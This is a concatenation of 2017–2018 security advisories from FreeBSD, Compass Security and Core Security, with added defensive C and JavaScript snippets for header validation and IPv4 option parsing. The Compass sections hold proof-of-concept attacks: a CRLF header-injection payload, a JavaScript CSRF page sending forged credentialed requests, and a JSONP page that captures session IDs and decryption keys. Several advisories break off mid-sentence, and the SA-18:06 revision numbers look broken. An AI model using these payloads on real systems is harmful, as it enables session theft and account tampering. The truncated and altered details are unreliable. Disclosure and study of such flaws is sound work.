# fetch https://security.FreeBSD.org/patches/SA-18:07/lazyfpu-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:07/lazyfpu-11.patch.asc
# gpg --verify lazyfpu-11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/11/                                                        r335169
releng/11.2/                                                      r335196
releng/11.1/                                                      r335465
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:

# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>

VII. References

<URL:https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00145.html>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3665>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:07.lazyfpu.asc>
CSNC-2018-021 - Vert.x - HTTP Header Injection
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Vert.x [1]
# CSNC ID:  CSNC-2018-021
# Subject:  HTTP Header Injection
# Risk:     Medium
# Effect:   Remotely exploitable
# Author:   Lukasz D. (advisor...@compass-security.com)
# Date:     12.06.2018
#
#############################################################

Introduction:
-------------
Eclipse Vert.x is a tool-kit for building reactive applications on the JVM. Vert.x can be used for simple network utilities, sophisticated modern web applications, HTTP/REST microservices, high volume event processing or full-blown back-end message-bus applications. Vert.x is used by many different companies, from real-time gaming to banking and everything in between.

Vert.x does not filter carriage return and line feed characters from the values of HTTP response headers it sets. This allows manipulating the values of the set HTTP headers and adding arbitrary new headers. In particular, issuing a redirection and manipulating cookies set by the server is possible.

Affected:
---------
The following Vert.x versions are vulnerable:
- 3.0.0 - 3.5.1

Technical Description:
----------------------
The method putHeader(String name, String value) used to set new headers in the HTTP response does not filter carriage return and line feed characters from the header value. If a web application uses a user-provided parameter as the value of a header, then it is possible for a user to add new HTTP headers of his choice.

For example, a Vert.x-based web application may use the vulnerable method like this: putHeader("User-Header", foo), where foo is the user-provided parameter. Then:

Requesting /vulnerable?foo=bar will add a header: "User-Header: bar".

Requesting /vulnerable?foo=bar%0D%0ASet-Cookie:%20mycookie=hello will add a header: "User-Header: bar" and additionally will set a new cookie with name "mycookie" and value "hello".

Workaround / Fix:
-----------------
It needs to be ensured that every header value which is set based on a user-provided parameter does not contain carriage return and line feed characters.
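The check the fix section calls for, as an added example in C that is not Vert.x code: the two parameter values from the requests above are percent-decoded and then validated against the RFC 7230 field-value grammar before a header line is built from them. Function names are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decode a query value into out (out_len bytes including the NUL).
 * Returns the decoded length, or -1 on malformed input or overflow. */
int url_decode(const char *in, char *out, size_t out_len)
{
    size_t n = 0;
    for (const char *p = in; *p; p++) {
        int c = (unsigned char)*p;
        if (c == '%') {
            if (!isxdigit((unsigned char)p[1]) || !isxdigit((unsigned char)p[2]))
                return -1;
            char hex[3] = { p[1], p[2], '\0' };
            c = (int)strtol(hex, NULL, 16);   /* %0D -> '\r', %0A -> '\n' */
            p += 2;
        } else if (c == '+') {
            c = ' ';
        }
        if (n + 1 >= out_len)
            return -1;
        out[n++] = (char)c;
    }
    out[n] = '\0';
    return (int)n;
}

/* Accept only what RFC 7230 allows in a field-value: visible ASCII, SP,
 * HTAB and obs-text (0x80-0xFF). CR, LF and every other control character
 * are rejected, which is what closes the CRLF injection described above. */
int header_value_is_safe(const char *value)
{
    for (const unsigned char *p = (const unsigned char *)value; *p; p++) {
        if (*p == ' ' || *p == '\t')
            continue;
        if (*p < 0x21 || *p == 0x7f)   /* CTL, including '\r' and '\n' */
            return 0;
    }
    return 1;
}

/* Application-side guard: decode the parameter and refuse to echo it into
 * a header unless it is safe. Returns 1 if header_line was filled in. */
int set_user_header(const char *raw_param, char *header_line, size_t line_len)
{
    char value[256];
    if (url_decode(raw_param, value, sizeof value) < 0)
        return 0;
    if (!header_value_is_safe(value))
        return 0;
    int n = snprintf(header_line, line_len, "User-Header: %s", value);
    return n > 0 && (size_t)n < line_len;
}

int main(void)
{
    char line[512];
    /* constructed inputs: the foo values from the two requests above */
    const char *benign = "bar";
    const char *crlf   = "bar%0D%0ASet-Cookie:%20mycookie=hello";

    printf("%s -> %d (%s)\n", benign, set_user_header(benign, line, sizeof line), line);
    printf("%s -> %d\n", crlf, set_user_header(crlf, line, sizeof line));
    return 0;
}
```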
Timeline:
---------
2018-02-22: Vulnerability discovered
2018-04-04: Initial vendor notification
2018-04-04: Initial vendor response
2018-06-04: Patched version released
2018-06-13: Public disclosure

References:
-----------
[1]: https://vertx.io/
[CORE-2018-0004] - Quest KACE System Management Appliance Multiple Vulnerabilities
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Quest KACE System Management Appliance Multiple Vulnerabilities

1. *Advisory Information*

Title: Quest KACE System Management Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0004
Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities
Date published: 2018-05-31
Date of last update: 2018-05-22
Vendors contacted: Quest Software Inc.
Release mode: Forced release

2. *Vulnerability Information*

Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141

3. *Vulnerability Description*

From Quest KACE's website:

"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."

Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user. Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.

Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.

CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aimed at mitigating risk. We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging in a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.

4. *Vulnerable Packages*

. Quest KACE System Management Appliance 8.0 (Build 8.0.318)

Other products and versions might be affected too, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at https://support.quest.com/download-install-detail/6086148.

For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and an unauthenticated perspective. Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user. Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication toke
[CORE-2018-0002] - Quest DR Series Disk Backup Multiple Vulnerabilities
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Quest DR Series Disk Backup Multiple Vulnerabilities

1. *Advisory Information*

Title: Quest DR Series Disk Backup Multiple Vulnerabilities
Advisory ID: CORE-2018-0002
Advisory URL: http://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities
Date published: 2018-05-31
Date of last update: 2018-05-22
Vendors contacted: Quest Software Inc.
Release mode: Forced release

2. *Vulnerability Information*

Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78] (the original advisory repeats this entry once for each of the command-injection CVEs below), Execution with Unnecessary Privileges [CWE-250] (likewise repeated once for each of the CWE-250 CVEs)
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-11143, CVE-2018-11144, CVE-2018-11145, CVE-2018-11146, CVE-2018-11147, CVE-2018-11148, CVE-2018-11149, CVE-2018-11150, CVE-2018-11151, CVE-2018-11152, CVE-2018-11153, CVE-2018-11154, CVE-2018-11155, CVE-2018-11156, CVE-2018-11157, CVE-2018-11158, CVE-2018-11159, CVE-2018-11160, CVE-2018-11161, CVE-2018-11162, CVE-2018-11163, CVE-2018-11164, CVE-2018-11165, CVE-2018-11166, CVE-2018-11167, CVE-2018-11168, CVE-2018-11169, CVE-2018-11170, CVE-2018-11171, CVE-2018-11172, CVE-2018-11173, CVE-2018-11174, CVE-2018-11175, CVE-2018-11176, CVE-2018-11177, CVE-2018-11178, CVE-2018-11179, CVE-2018-11180, CVE
CSNC-2018-003 totemomail Encryption Gateway - Cross-Site Request Forgery
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
# Product:  totemomail Encryption Gateway
# Vendor:   totemo AG
# CSNC ID:  CSNC-2018-003
# CVE ID:   CVE-2018-6563
# Subject:  Cross-Site Request Forgery
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger <nicolas.heini...@compass-security.com>
# Date:     14.05.2018
#

Introduction:
-------------
The totemomail Encryption Gateway protects email communication with any external partner by encryption. It doesn't matter whether you exchange emails with technically savvy communication partners or with those who have neither an appropriate infrastructure nor the necessary know-how. The encryption gateway also makes it easy to securely send very large attachments. [1]

Compass Security discovered a vulnerability in the webmail part of the solution. It is possible to predict all parameters that are required to execute actions on the webmail interface. This allows an attacker to perform Cross-Site Request Forgery (CSRF) attacks. The attacker needs to craft a malicious web page that will automatically send a request to the Encryption Gateway. If the user is logged in, the request will be executed by the Encryption Gateway on behalf of the logged-in user. This could be used to change a user's settings, send emails or change contact information.

Affected:
---------
Vulnerable:
 * 6.0.0_Build_371

No other version was tested but it is likely that older versions are affected as well.

Technical Description
---------------------
In the webmail, no anti-CSRF token is used. Although the viewState makes the attack more complex, it is possible to entirely predict the requests and thus perform CSRF attacks. The requirement here is to perform the attack as a replay of a full user interaction: one has to replay every request to make sure that the viewState is updated on the server side and corresponds to the action that is performed by the malicious page.

Such a malicious page is presented below; it will automatically send three requests that change the user's details:

==
function submitRequest1() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/webmail\/newMessage.xhtml", true);
  xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
  xhr.withCredentials = true;
  var body = "tabNavigationForm_SUBMIT=1&javax.faces.ViewState=An36[CUT BY COMPASS]XBJn&tabNavigationForm_j_id_24_j_id_26=tabNavigationForm$
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}

function submitRequest2() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
  xhr.setRequestHeader("Accept", "application\/xml, text\/xml, *\/*; q=0.01");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
  xhr.withCredentials = true;
  var body = "javax.faces.partial.ajax=true&javax.faces.source=preferencesForm_phoneNumber_input_text&javax.faces.partial.execute=preferencesForm_phoneNumber_input_tex$
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}

function submitRequest3() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
  xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
  xhr.withCredentials = true;
  var body = "preferencesForm_firstname_input_text=CSRF&preferencesForm_lastname_input_text=CSRF&preferencesForm_phoneNumber_input_text=%2B41+00+000+00+00&preferencesF
CSNC-2018-002 totemomail Encryption Gateway - JSONP hijacking
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
# Product:  totemomail Encryption Gateway
# Vendor:   totemo AG
# CSNC ID:  CSNC-2018-002
# CVE ID:   CVE-2018-6562
# Subject:  JSONP hijacking
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger <nicolas.heini...@compass-security.com>
# Date:     14.05.2018
#

Introduction:
-------------
The totemomail Encryption Gateway protects email communication with any external partner by encryption. It doesn't matter whether you exchange emails with technically savvy communication partners or with those who have neither an appropriate infrastructure nor the necessary know-how. The encryption gateway also makes it easy to securely send very large attachments. [1]

Compass Security discovered a vulnerability in the process of decrypting a secure message sent to an external partner. This issue could lead to the user's session on the gateway being stolen. The encryption material for the encrypted email could also be stolen in the same way.

Affected:
---------
Vulnerable:
 * 6.0.0_Build_371

No other version was tested but it is likely that older versions are affected as well.

Technical Description
---------------------
When sending an encrypted email to a recipient outside of the organization, totemomail Encryption Gateway sends a so-called Envelope Message that includes an HTML file with the encrypted content and JavaScript to get the key from the gateway to decrypt the content. The key material is provided by the gateway through a JSONP callback that must be authenticated either with the email and password in the POST request or with an existing session ID.

An example is provided below:

==
GET /responsiveUI/EnvelopeOpenServlet?envelopeAction=decryptionKey&messageId=160_1&[parameter name lost]=jsonpCallback&user=[CUT BY COMPASS]&password=[CUT BY COMPASS]&mtan=&_=1515597892513 HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=EF8E33D6DAD75F0394381AB7084DEA2D; oam.Flash.RENDERMAP.TOKEN=uy9dqvc4a
Connection: close
==

The response contains the key material as well as the session ID:

==
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 206
Date: Wed, 10 Jan 2018 15:26:17 GMT

jsonpCallback({"iv": "AJD[CUT BY COMPASS]w==", "key": "OYP[CUT BY COMPASS]w=", "cipher": "AES\/CBC\/PKCS5Padding", "keyAlgo": "AES", "session": "EF8E33D6DAD75F0394381AB7084DEA2D"});
==

The problem arises because the same request is accepted if a session already exists on the Encryption Gateway. In this case, the username and password are not required. This enables an attacker to create a malicious web page that defines a JavaScript function 'jsonpCallback' and inserts a script tag whose source is on the Encryption Gateway. This way, it is possible to retrieve the response in the callback if a logged-in user visits the malicious page.

An example of such a malicious page is given below; note that the user, password and mtan parameters are not required:

==
<title>JSONP data and session stealing PoC</title>
<script>
function jsonpCallback(obj) {
  document.write('<p>Your data is:</p>');
  document.write('<code>' + JSON.stringify(obj) + '</code>')
}
</script>
<h1>JSONP data and session stealing PoC</h1>
<script src="https://[CUT BY COMPASS]/responsiveUI/EnvelopeOpenServlet?envelopeAction=decryptionKey&messageId=160_1"></script>
==

The only issue one can run into is guessing the message ID, but as far as Compass was able to observe this is kept in a form XXX_YY where XXX is a 3-digit number and YY is a 1- or 2-digit number. This allows for a brute force attack even over the Internet.

Workaround / Fix:
-----------------
Install an up to date version of totemomail Encryption Gateway.

As a developer, JSONP callbacks should not include sensitive information. If they need to, the request must include an unpredictable element. In this case a possibility would be to require the email and the password of the user even if the session is open.

Timeline:
---------
2018-05-14: Coordinated public disclosure date
2018-04-XX: Release of fixed version 6.0_b567
2018-02-13: Initial vendor response
2018-02-09: Initial vendor notification
2018-02-02: Assigned CVE-2018-6562
2018-01-10: Discovery by Nicolas Heiniger

References:
-----------
[1] https://www.totemo.com/en/solutions/email-encryption/external-encryption
FreeBSD Security Advisory FreeBSD-SA-18:06.debugreg
=============================================================================
FreeBSD-SA-18:06.debugreg                                   Security Advisory
                                                          The FreeBSD Project

Topic:          Mishandling of x86 debug exceptions

Category:       core
Module:         kernel
Announced:      2018-05-08
Credits:        Nick Peterson, Everdox Tech LLC
                https://www.linkedin.com/in/everdox
                Andy Lutomirski
Affects:        All supported versions of FreeBSD.
Corrected:      2018-05-08 17:03:33 UTC (stable/11, 11.2-PRERELEASE)
                2018-05-08 17:12:10 UTC (releng/11.1, 11.1-RELEASE-p10)
                2018-05-08 17:05:39 UTC (stable/10, 10.4-STABLE)
                2018-05-08 17:12:10 UTC (releng/10.4, 10.4-RELEASE-p9)
CVE Name:       CVE-2018-8897

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

On x86 architecture systems, the stack is represented by the combination of a stack segment and a stack pointer, which must remain in sync for proper operation. Instructions related to manipulating the stack segment have special handling to facilitate consistency with changes to the stack pointer.

II.  Problem Description

The MOV SS and POP SS instructions inhibit debug exceptions until the instruction boundary following the next instruction. If that instruction is a system call or similar instruction that transfers control to the operating system, the debug exception will be handled in the kernel context instead of the user context.

III. Impact

An authenticated local attacker may be able to read sensitive data in kernel memory, control low-level operating system functions, or may panic the system.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, using either a binary or source code patch, and then reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

And reboot.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch.asc
# gpg --verify debugreg.11.1.patch.asc

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch.asc
# gpg --verify debugreg.10.4.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile and install your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                          r70
releng/10.4/                                                        r71
stable/11/                                                          r69
releng/11.1/                                                        r71
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:06.debugreg.asc>
FreeBSD Security Advisory FreeBSD-SA-18:05.ipsec
=============================================================================
FreeBSD-SA-18:05.ipsec                                      Security Advisory
                                                          The FreeBSD Project

Topic:          ipsec crash or denial of service

Category:       core
Module:         ipsec
Announced:      2018-04-04
Credits:        Maxime Villard
Affects:        All supported versions of FreeBSD.
Corrected:      2018-01-31 09:24:48 UTC (stable/11, 11.1-STABLE)
                2018-04-04 05:37:52 UTC (releng/11.1, 11.1-RELEASE-p9)
                2018-01-31 09:26:28 UTC (stable/10, 10.4-STABLE)
                2018-04-04 05:37:52 UTC (releng/10.4, 10.4-RELEASE-p8)
                2018-04-04 05:37:52 UTC (releng/10.3, 10.3-RELEASE-p29)
CVE Name:       CVE-2018-6918

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The IPsec suite of protocols provides network level security for IPv4 and IPv6 packets. FreeBSD includes software originally developed by the KAME project which implements the various protocols that make up IPsec.

In IPsec, the IP Authentication Header (AH) is used to provide protection against replay attacks and connectionless integrity and data origin authentication for IP datagrams.

II.  Problem Description

The length field of the option header does not count the size of the option header itself. This causes a problem when the length is zero: the offset is then advanced by zero on every pass, which produces an infinite loop. In addition there are pointer/offset mistakes in the handling of IPv4 options.

III. Impact

A remote attacker who is able to send an arbitrary packet could cause the remote target machine to crash.

IV.  Workaround

No workaround is available. Note that in FreeBSD 10 IPsec is not included in the kernel by default, but it is in FreeBSD 11.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:05/ipsec.patch
# fetch https://security.FreeBSD.org/patches/SA-18:05/ipsec.patch.asc
# gpg --verify ipsec.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r328621
releng/10.3/                                                      r331985
releng/10.4/                                                      r331985
stable/11/                                                        r328620
releng/11.1/                                                      r331985
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6918>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:05.ipsec.asc>
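The loop described in FreeBSD-SA-18:05 comes down to one missing check when walking IPv4 options. As an added example, not FreeBSD's code, here is an option walk with the termination checks a parser needs: an option length below 2 (in particular 0), which would otherwise advance the offset by zero on every iteration, and a length reaching past the header are both rejected before the offset moves. The header bytes are constructed for the example.

```javascript
// Added example, not FreeBSD's code. Per RFC 791 an IPv4 option's length byte
// counts the type and length bytes themselves, so a value below 2 can never be
// stepped over: the FreeBSD-SA-18:05 loop stalled because `off += len` with
// len == 0 left the offset where it was. The walk below rejects that instead.
function walkIPv4Options(hdr) {
  if (hdr.length < 20 || (hdr[0] >> 4) !== 4) throw new Error('not an IPv4 header');
  const ihl = (hdr[0] & 0x0f) * 4;             // header length in bytes, options included
  if (ihl < 20 || ihl > hdr.length) throw new Error(`bad IHL ${ihl}`);
  const opts = [];
  let off = 20;                                 // options start after the fixed header
  while (off < ihl) {
    const type = hdr[off];
    if (type === 0) break;                      // EOL: remainder of the area is padding
    if (type === 1) { off += 1; continue; }     // NOP: single byte, no length field
    if (off + 1 >= ihl) throw new Error(`option type ${type} truncated at ${off}`);
    const len = hdr[off + 1];
    // The guard the vulnerable pattern lacked: len < 2 would stall the loop,
    // len past ihl would read beyond the header. Both are errors, not steps.
    if (len < 2 || off + len > ihl) throw new Error(`bad option length ${len} at ${off}`);
    opts.push({ type, len, data: Array.from(hdr.subarray(off + 2, off + len)) });
    off += len;
  }
  return opts;
}

// Constructed IPv4 header: version 4, IHL derived from the option bytes appended.
function makeHeader(options) {
  const hdr = new Uint8Array(20 + options.length);
  hdr[0] = 0x40 | ((hdr.length / 4) & 0x0f);   // IHL is in 32-bit words
  hdr.set(options, 20);
  return hdr;
}

// NOP, Router Alert (type 148, len 4, value 0), EOL, padding: IHL = 7.
const GOOD_HEADER = makeHeader([1, 148, 4, 0, 0, 0, 0, 0]);
// Same layout, but the Router Alert option claims length 0.
const ZERO_LEN_HEADER = makeHeader([1, 148, 0, 0, 0, 0, 0, 0]);
// A length that runs past the end of the header area.
const OVERLONG_HEADER = makeHeader([148, 12, 0, 0, 0, 0, 0, 0]);

function demo() {
  const parsed = walkIPv4Options(GOOD_HEADER);
  const rejected = [];
  for (const h of [ZERO_LEN_HEADER, OVERLONG_HEADER]) {
    try { walkIPv4Options(h); rejected.push(null); } catch (e) { rejected.push(e.message); }
  }
  return { parsed, rejected };
}
```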
FreeBSD Security Advisory FreeBSD-SA-18:04.vt
=============================================================================
FreeBSD-SA-18:04.vt                                         Security Advisory
                                                          The FreeBSD Project

Topic:          vt console memory disclosure

Category:       core
Module:         vt console
Announced:      2018-04-04
Credits:        Dr Silvio Cesare of InfoSect
Affects:        All supported versions of FreeBSD.
Corrected:      2018-04-04 05:24:59 UTC (stable/11, 11.1-STABLE)
                2018-04-04 05:33:56 UTC (releng/11.1, 11.1-RELEASE-p9)
                2018-04-04 05:26:33 UTC (stable/10, 10.4-STABLE)
                2018-04-04 05:33:56 UTC (releng/10.4, 10.4-RELEASE-p8)
                2018-04-04 05:33:56 UTC (releng/10.3, 10.3-RELEASE-p29)
CVE Name:       CVE-2018-6917

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

On FreeBSD 11 and later, and FreeBSD 10.x systems that boot via UEFI, the default system video console is provided by the vt(4) driver. The console allows the user, including an unprivileged user, to load a font at runtime.

II.  Problem Description

Insufficient validation of user-provided font parameters can result in an integer overflow, leading to the use of arbitrary kernel memory as glyph data. Characters that reference this data can be displayed on the screen, effectively disclosing kernel memory.

III. Impact

Unprivileged users may be able to access privileged kernel data. Such memory might contain sensitive information, such as portions of the file cache or terminal buffers. This information might be directly useful, or it might be leveraged to obtain elevated privileges in some way; for example, a terminal buffer might include a user-entered password.

IV.  Workaround

The syscons sc(4) system console is not affected by this issue and may be used on systems that do not boot via UEFI. To use the syscons console, set the kern.vty tunable in /boot/loader.conf as described in sc(4), and reboot.

No workaround is available for systems that boot via UEFI.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

A reboot is required after the upgrade.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:04/vt.patch
# fetch https://security.FreeBSD.org/patches/SA-18:04/vt.patch.asc
# gpg --verify vt.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r331983
releng/10.3/                                                      r331984
releng/10.4/                                                      r331984
stable/11/                                                        r331982
releng/11.1/                                                      r331984
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6917>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:04.vt.asc>
CSNC-2017-026 Microsoft Intune - Preserved Keychain Entries
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
# Product:  Microsoft Intune [1]
# Vendor:   Microsoft
# CSNC ID:  CSNC-2017-026
# Subject:  Preserved Keychain Entries
# Risk:     Medium
# Effect:   Locally exploitable
# Author:   Stephan Sekula <stephan.sek...@compass-security.com>
# Date:     31.08.2017
#

Introduction:
-------------
